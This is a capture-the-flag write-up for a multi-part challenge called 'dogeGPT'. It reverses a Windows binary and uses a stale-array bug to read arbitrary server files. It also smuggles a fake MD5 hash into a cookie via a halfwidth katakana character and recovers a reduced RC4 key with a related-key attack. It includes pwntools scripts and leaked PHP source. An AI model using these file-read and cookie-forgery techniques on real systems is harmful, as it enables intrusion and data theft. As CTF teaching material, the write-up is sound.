Level 10: dogeGPT (rev, pwn, web, crypto)
After registering at the challenge website, we are redirected to /start.php
, which contains a button which we can use to start the dogeGPT service, which is accessible via a TCP connection.
The service allows us to start a chat and enter a prompt, which 'dogeGPT' will respond to.
We can also display a help menu, but it seems useless. There is also an option to get dogekey
, but it doesn't seem to do anything.
Digging deeper into start.php
, we find a HTML comment referencing a 'files.php' endpoint and a 'decrypt-flag.php' endpoint.
<!--
lol i forgot to delete a comment
<a href="/files.php">Download dogeGPT here!</a><br><br>
<a href="/decrypt-flag.php">Shutdown dogeGPT and retrieve flag here :(</a>
-->
Heading over to /files.php
, we can download the dogeGPT.exe
binary. The /files.php
endpoint also leaks the location of the source code as C:\lmao\weird\folder\htdocs\files.php
via an error message.
Inspecting cookies, we can observe that a cookie u
is set. It's value appears to be
base64_encode(username + "\x80" + md5_hex(username)[:16])
For example, registering as admin
gives YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw==
which decodes to admin\x8021232f297a57a5a7
.
Rev
Opening up the dogeGPT.exe
binary in IDA, we quickly realize that it is a C++ executable (the .i64
file can be found here). I'll be referring to functions and global variables as I named them in IDA.
We define the following structs in IDA to help us better understand the code:
struct cpp_str {
char* ptr;
char extra_data[8];
long length;
long capacity;
};
If the length of the string is less than 16 bytes, it is stored in the ptr
and extra_data
fields. If it's at least 16 bytes, the string is stored in the heap and a reference to it is stored in ptr
.
struct cpp_str_arr {
cpp_str* start;
cpp_str* end;
cpp_str* limit;
};
This struct functions like a resizable array. If end == limit
, then the array is reallocated to accommodate more cpp_str
s.
After some debugging and trial and error, I realized that the program required 4 arguments. The second argument is the IP to accept connections from, and the fourth is the port to listen on.
The purpose of the first and third arguments will be discussed later.
Tracing the execution flow for input get dogekey
leads us to read_keyfile
.
cpp_str *__fastcall read_keyfile(cpp_str *output)
{
cpp_str *v2; // rax
cpp_str *v3; // rax
__int64 v4; // rdx
cpp_str *v5; // rax
cpp_str *v6; // rax
char *ptr; // rcx
char *v8; // rcx
cpp_str Block; // [rsp+20h] [rbp-78h] BYREF
cpp_str *v11; // [rsp+48h] [rbp-50h]
cpp_str v12; // [rsp+50h] [rbp-48h] BYREF
cpp_str v13; // [rsp+70h] [rbp-28h] BYREF
v11 = output;
if ( key_flag )
{
v2 = copy(&v13, &key_filename);
v3 = read_whole_file(&v12, (__int64)v2);
v5 = concat2(v3, v4, "Congrats! The dogekey has been encrypted! It is: ", 0x31ui64);
memset(&Block, 0, sizeof(Block));
Block = *v5;
v5->length = 0i64;
v5->cap = 15i64;
LOBYTE(v5->ptr) = 0;
v6 = append(&Block, "\n", 1ui64);
// output
}
else
{
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
append_str(output, "\n", 1ui64);
}
return output;
}
If the key_flag
global variable is not set, the function returns an empty string, which explains why nothing seems to be happening when we enter get dogekey
. If key_flag
is set, the file referenced by key_filename
is read and the contents sent to the user.
Searching for references to key_flag
leads us to this fragment of code in print_doge
:
v6 = copy(&out, input);
hash(&v163, (__int64)v6);
last = get_first_(&v163, &hash_subset, 0i64, 0x10ui64);
v8 = memcmp_hash(last);
reset_str(&hash_subset);
v9 = key_flag;
if ( v8 )
v9 = 1;
key_flag = v9;
hash
performs a md5
hash on the input and writes the hex encoded hash to v163
. get_first
then extracts the first 0x10
characters from the hash into hash_subset
. memcmp_hash
compares the computed hash with the third argument to the program (stored in the global variable hash_val
).
Hmm, this seems quite similar to the u
cookie we discovered earlier, which contains the first 16 characters of the md5 hash of our username. Maybe hash_val
is also the first 16 characters of the md5 hash of our username?
This is proven correct when we enter our username, followed by get dogekey
. The string Congrats! The dogekey has been encrypted! It is:
is printed, indicating that key_flag
had been set.
However, the dogekey has still not been revealed. This is because the key_filename
variable has not been set. Searching for references to key_filename
, we find the gen_keyfilename
function which is called in print_doge
:
if ( (unsigned __int16)result_accumulator == (_DWORD)v159 )
gen_keyfilename(v140, v139, v141);
Using a debugger, we can observe that result_accumulator
is initialized to 0xd06e
and v159
is the integer value represented by the last 4 hex characters of hash_val
(which is the first 16 characters of the md5 hash of our username).
Searching for references to result_accumulator
leads us to spawn_process
, where our input is passed to the C:\dogeGPT\parser.py
program:
join(
&lpCommandLine,
(__int64)input,
a3,
"C:\\Progra~1\\Python311\\python.exe c:\\dogeGPT\\parser.py ",
0x36ui64,
ptr,
input->length
);
// ...
if ( !CreateProcessA(0i64, p_lpCommandLine, 0i64, 0i64, 1, 0x10u, 0i64, 0i64, &StartupInfo, &ProcessInformation) )
{
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
LABEL_5:
v6 = 0i64;
goto LABEL_6;
}
The output of the process is then parsed:
if ( Buf.length && (v16 = memchr(process_output, ',', Buf.length)) != 0i64 )
comma_index = (_DWORD)v16 - (_DWORD)process_output;
else
comma_index = -1;
v18 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
v18 = Buf.ptr;
if ( length && (v19 = memchr(v18, '\r', length)) != 0i64 )
newline_index = (_DWORD)v19 - (_DWORD)v18;
else
newline_index = -1;
if ( comma_index && newline_index )
{
memset(&v48, 0, sizeof(v48));
v21 = comma_index;
if ( length < comma_index )
v21 = length;
v22 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
v22 = Buf.ptr;
append_str(&v48, v22, v21);
after_comma = comma_index + 1;
memset(&String, 0, sizeof(String));
if ( Buf.length < after_comma )
invalid_strpos();
num_len = newline_index - comma_index - 1;
if ( Buf.length - after_comma < num_len )
num_len = Buf.length - after_comma;
buf_ptr = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
buf_ptr = Buf.ptr;
append_str(&String, &buf_ptr[after_comma], num_len);
v26 = errno();
v27 = v26;
p_String = (char *)&String;
if ( String.cap >= 0x10ui64 )
p_String = String.ptr;
*v26 = 0;
v29 = strtol(p_String, (char **)NumberOfBytesRead, 10);
if ( p_String == *(char **)NumberOfBytesRead )
{
std::_Xinvalid_argument("invalid stoi argument");
__debugbreak();
}
if ( *v27 == 34 )
{
std::_Xout_of_range("stoi argument out of range");
__debugbreak();
}
result_accumulator += v29;
// ...
}
Here's a Python implementation of that long, confusing chunk of code:
s, i = process_output.split(",")[:2]
result_accumulator += int(i)
From this, we can infer that parser.py
outputs something in the form of string,integer
. The integer portion of the output is parsed and added to result_accumulator
. It seems that the string portion of the output is our input string. Therefore, if our input string contains a ,
character followed by an integer, we can control the value of v29
and thus the value of result_accumulator
. Since we know the target value that result_accumulator
needs to be and the initial value, we can calculate the input required to reach the target.
I wrote a script to generate inputs that achieve both conditions of setting key_flag
and key_filename
:
from pwn import *
import random
def get5():
return b"".join([random.choice(string.ascii_letters).encode() for _ in range(5)])
def gen(a):
h = md5sum(a).hex()[:16]
h = int(h[-4:],16)
if h < 0xd06e:
return False
return md5sum(a).hex()[:16], a, f"awyuyruyuyrueure,{h-0xd06e}"
def gen_rnd():
res = False
while not res:
x = get5()
res = gen(x+b",0")
return res
One possible input combination is username = lUArf,0
and subsequent input awyuyruyuyrueure,7689
. Since the first 16 characters of the md5 hash of lUArf,0
is ec6b23e906d9ee77
and 7689 + 0xd06e = 0xee77
, gen_keyfilename
function will be called. The username needs to end in ,0
to avoid affecting the result_accumulator
.
Entering lUArf,0
and awyuyruyuyrueure,7689
after registering as lUArf,0
results in the dogekey being printed, but unfortunately this doesn't bring us much closer to the flag.
get dogekey
Congrats! The dogekey has been encrypted! It is: 89abe660cba142e3e8b2861ca5e8b81a
Upon further debugging, it appears that the dogekey is the first argument of the binary and is written to C:\dogeGPT\<ip>-<username hash>
when the gen_keyfilename
function is called.
Pwn
After a week of reversing and debugging the binary, I noticed a very strange behavior. In the start_server
function, the load_files
function is called when the user connects to the dogeGPT process. This loads the filenames of the help file and the path of the wordlists used to generate dogeGPT responses into a global filenames
variable (which is a cpp_str_arr
):
Interestingly, in the process_input
function, user input is also appended to this array, even though it is not a filename:
if ( filenames.end == filenames.limit )
{
copy_with_resize(&filenames, filenames.end, input);
end = filenames.end;
}
else
{
copy(filenames.end, input);
end = ++filenames.end;
}
This results in filenames
being a mix of user input and actual filenames:
Upon ending chat, the filenames
array is reset:
if ( filenames.start != end )
{
delete_string_range(filenames.start, end);
filenames.end = filenames.start;
}
files_loaded = 0;
cleanup_keyfile();
v18 = 15i64;
v19 = "Ending chat...\n";
However, the help menu still functions even if the chat is ended.
v8 = copy(&v26, filenames.start);
v9 = read_whole_file(&Block, (__int64)v8);
v10 = append(v9, "\n", 1ui64);
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
*output = *v10;
Interestingly, it reads and returns the contents of the file referenced by filenames.start
to the user. This works because help.txt
is the first file that's loaded.
However, since the filenames
array was reset when the chat was ended, filenames.start
no longer contains help.txt
but our user input! Therefore, we can trick the program into exposing arbitrary files.
We can use this vulnerability to expose parser.py
as well as start.php
that is responsible for starting the dogeGPT service:
r = remote(ip, int(port))
path = r"C:\lmao\weird\folder\htdocs\start.php"
r.sendline("end chat")
r.sendlineafter("...", path)
r.sendlineafter("...", "help")
pause(1)
data = r.clean()
print(data.decode())
Web
After leaking index.php
using the bug described in the previous section, we find the following code used to generate the u
cookie:
$str = $_POST['uname'];
if (!preg_match("/[\p{N}\p{Z}\p{L}\p{M}]*/u",$str) || $str == "") {
echo("Bad username!!<br>");
die();
}
$h = substr(md5($str),0,16);
$uid = base64_encode($str . "\x80" . $h);
setcookie("u", $uid, time()+60);
As expected, uid
is a base64 string consisting of the username concatenated with \x80
and the first 16 characters of the md5 hash of the username.
Using regex101 to explain the regex, it seems that \p{L}
matches 'any kind of letter from any language'. Luckily, the unicode code point 0xff80
is タ, which is HALFWIDTH KATAKANA LETTER TA
, so this passes the regex. However, this also allows us to inject the \x80
character, which allows us to supply a fake md5 hash. To see how this is important, let's look at start.php
:
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/^[\da-f]+$/u",$aa[1])) {
header("Location: /");
die();
}
$uid = substr($aa[1],0,16);
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode(" ", $a1[2])[3];
exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode(" ", $a2[2])[3];
$ef = enc($pri, $uid, $f);
$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
proc_open("C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, [0=>["pipe","r"]], $p);
The $uid
is used as an input to the enc
function which generates $ef
which is used as the 'encrypted dogekey' referred to by dogeGPT.exe
. By using the unicode trick explored above, we can set $uid
to any 16 character hexadecimal string we want.
Crypto
The enc
function is defined in encrypt.php
. It's quite long, so here's a simple python implementation:
def encrypt(prikey, uid, data):
sbox = [i for i in range(16)]
keystream = [(x+y)%16 for x,y in zip(prikey, uid)]
j = 0
for i in range(16):
j = (j + sbox[i] + keystream[i]) % 16
sbox[i], sbox[j] = sbox[j], sbox[i]
i= 0
j = 0
out = []
for k in range(len(data)):
i = (i+1)%16
j = (j+sbox[i])%16
sbox[i], sbox[j] = sbox[j], sbox[i]
keychar = (sbox[i] + sbox[j])%16
out += ([(data[k]^sbox[keychar])])
return out
If you're well versed in crypto, you'll recognize this as a variant of RC4, except the sbox has been reduced to 16 hexadecimal numbers (8 bytes) instead of the 256 bytes of full RC4. We are also able to modify the key used to generate the sbox via the supplied uid.
Since I'm quite bad at crypto, I was stuck at this stage for a while, until the challenge author prompted me to explore the system further.
This lead me to look deeper at parser.py
:
import sys
import requests
import openai
text = ""
for i in range(len(sys.argv)):
if i > 0:
text = text + sys.argv[i] + " "
response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
c = 0
if len(response) != 0:
for i in range(requests.get_len() // len(text)):
if requests.is_sus(i):
c += i
print(response[c % len(response)]+","+str(c))
else:
print(",0")
Obviously, requests
is not the real requests library, since the real library doesn't have a requests.is_sus
method. Reading the requests.py
file revealed the following QR code:
m = "@@@@@@@ @@ @ @ @@@@@@@"
m += "@ @ @@ @ @@@@ @ @ @"
m += "@ @@@ @ @ @@ @ @ @ @@@ @"
m += "@ @@@ @ @ @ @@@ @@@@ @ @@@ @"
m += "@ @@@ @ @ @@ @ @@@ @ @@@ @"
m += "@ @ @ @ @@@ @ @"
m += "@@@@@@@ @ @ @ @ @ @ @ @@@@@@@"
m += " @@ @@ @@ @ "
m += "@ @ @ @ @@@ @@ @ @ @ @ "
m += "@@ @@ @ @ @@ @ @ @ @ @"
m += " @ @@@@ @ @ @ @@ @@ @ @@@"
m += " @ @ @ @ @ "
m += "@ @@ @ @@ @@ @ @@ @ @@"
m += " @ @@ @ @ @@@@@@@@ @ @"
m += "@@ @ @@@@@@@ @@@@ @ @@@ @@"
m += "@@ @ @@ @@ @@ @@@ @@@ @ @ "
m += "@ @@ @ @ @@ @@@@ @ @@"
m += " @@ @ @@@ @@ @@@@ @@ @"
m += "@ @ @@@ @@ @ @ @ @@ @@"
m += " @@ @ @ @ @@ @@ @@ @ "
m += "@ @ @@ @@@ @ @@@ @@@@@ "
m += " @@ @ @@ @ @ @ @@@"
m += "@@@@@@@ @@ @@@ @@@ @ @@ @@"
m += "@ @ @@ @@ @@ @ @@ @ "
m += "@ @@@ @ @@ @@ @ @@@@@ @ "
m += "@ @@@ @ @ @@ @ @@ @ "
m += "@ @@@ @ @@ @@@ @ @ @@@ @"
m += "@ @ @ @@ @ @@ @ "
m += "@@@@@@@ @ @@@ @ @@@ @ @@"
def is_sus(i):
return(m[i % len(m)] == "@")
def get_len():
return(len(m))
A scannable version of the QR code can be found here.
I realized that it would be too expensive to make real requests to OpenAI, so the openai
library used must be fake too. Indeed it was:
import nltk
import numpy
class ChatComplete:
def create(model, messages):
text = nltk.word_tokenize(messages)
tags = nltk.pos_tag(text)
stuff = []
for tag in tags:
if tag[1] == "NN" or tag[1] == "NNP":
if numpy.is_sus(len(tag[0])*len(tags)):
stuff.append(tag[0])
stuff.append(tag[0])
stuff.append(tag[0])
else:
stuff.append(tag[0])
stuff.append(tag[0])
if tag[1] == "VBG" or tag[1] == "JJ":
if numpy.is_sus(len(tag[0])*len(tags)):
stuff.append(tag[0])
stuff.append(tag[0])
else:
stuff.append(tag[0])
stuff.append(tag[0])
stuff.append(tag[0])
if tag[1] == "VB":
if numpy.is_sus(len(tag[0])*len(tags)):
stuff.append(tag[0])
return stuff
This revealed the use of the nltk
library (which was legitimate) and the numpy
library, which contained the following QR code:
m = "@@@@@@@ @ @@ @@@@@@@"
m += "@ @ @ @ @@@@ @ @"
m += "@ @@@ @ @ @ @@@ @"
m += "@ @@@ @ @@@ @@@@@ @ @@@ @"
m += "@ @@@ @ @ @ @ @ @@@ @"
m += "@ @ @@ @@ @@ @ @"
m += "@@@@@@@ @ @ @ @ @ @@@@@@@"
m += " @@@ @@ "
m += "@@@@@ @@@@ @ @@@@@ @ @ @ "
m += " @@@@@ @ @ @ @@ @ @@ "
m += " @ @@ @ @ @ @@@@@ @ @@"
m += "@ @ @@ @@ @ @ @@ @"
m += " @@@@ @@ @@@@@@@@ @@ "
m += "@@@@@ @@@ @ @ @@"
m += "@ @@@@@@ @@@@@@@@@@@@@ @@"
m += "@ @ @ @@ @@@ "
m += "@ @ @@@ @@ @@@@@@@@ "
m += " @@ @@ @@ @ "
m += "@@@@@@@ @ @@ @ @ @@ @"
m += "@ @ @ @@ @@ @ @@"
m += "@ @@@ @ @@ @ @@@@@@@@@@@"
m += "@ @@@ @ @@@ @ @@@@ @@@"
m += "@ @@@ @ @@ @@ @ @ @ @"
m += "@ @ @ @ @ @@ @@ @"
m += "@@@@@@@ @@ @ @ @@@@"
def is_sus(i):
return(m[i % len(m)] == "@")
That QR code decodes to .\htdocs\welp-sus.pdf
, which corresponds to http://13.251.171.1/welp-sus.pdf.
That PDF is the first page of A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model, which seems to be exactly the attack to use in this case.
My implementation of the attack can be found here: attack.py, worker.py, get_encryption.py. I used 4 worker processes to speed things up and after a couple of hours, the full key was leaked:
[12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]
Next, I obtained the encrypted dogekey with uid=0:
9e51eafb37f35cd7b8ada161c19e875c
and decrypted it using the leaked key to reveal the following decrypted dogekey:
600d715cf1a6baadd06e10000d011a55
Reading decrypt-flag.php
, it seems that a check has been added to only allow local access:
<?php
if ($_SERVER['REMOTE_ADDR'] != "127.0.0.1") {
header("HTTP/1.1 401 Unauthorized");
echo "<h1>401 Unauthorized: Access Denied LMAO</h1>";
die;
}
$flag = "";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
$key = $_POST['dogekey'];
for ($i = 0; $i < 0xffffff; $i++) {
$key = hash('sha256', $key);
}
$cipher = "aes-256-cbc";
$flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);
}
?>
If we run a local php web server and visit decrypt-flag.php
, we can enter the decrypted dogekey and the flag will be returned:
TISC{5UCH_@I_V3RY_IF_3153_W0W}